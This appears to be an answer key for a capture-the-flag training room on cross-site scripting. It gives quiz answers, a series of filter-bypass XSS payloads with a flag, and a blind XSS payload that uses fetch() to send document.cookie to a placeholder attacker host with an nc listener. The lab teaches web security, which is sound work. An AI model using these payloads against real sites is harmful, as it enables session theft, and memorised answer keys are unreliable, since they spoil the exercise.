Intro to Cross-site Scripting
Task 1 - Room Brief
Q1. What does XSS stand for?
Answer - Cross-Site Scripting
Task 2 - XSS Payloads
Q1. Which document property could contain the user's session token?
Answer - document.cookie
Q2. Which JavaScript method is often used as a Proof Of Concept?
Answer - alert
Task 3 - Reflected XSS
Q1. Where in a URL is a good place to test for reflected XSS?
Answer - parameters
Task 4 - Stored XSS
Q1. How are stored XSS payloads usually stored on a website?
Answer - database
Task 5 - DOM Based XSS
Q1. What unsafe JavaScript method is good to look for in source code?
Answer - eval()
Task 6 - Blind XSS
Q1. What tool can you use to test for Blind XSS?
Answer - XSS Hunter Express
Q2. What type of XSS is very similar to Blind XSS?
Answer - Stored XSS
Task 7 - Perfecting your payload
Q1. What is the flag you received from level six?
STEP 1 - <script>alert('THM')</script>
STEP 2 - a"><script>alert('THM')</script>
STEP 3 - </textarea><script>alert('THM')</script>
STEP 4 - ';alert('THM') //
STEP 5 - <sscriptcript>alert('THM')</sscriptcript>
STEP 6 - x" onerror="alert('THM')"
Answer - THM{XSS_MASTER}
Task 8 - Practical Example (Blind XSS)
Q1. What is the value of the staff-session cookie?
</textarea><script>fetch('http://URL_OR_IP:PORT_NUMBER?cookie=' + btoa(document.cookie) );</script>
(replace URL_OR_IP:PORT_NUMBER with your AttackBox IP and the port opened by the nc -lvnp 3210 listener)
Answer - 4AB305E55955197693F01D6F8FD2D321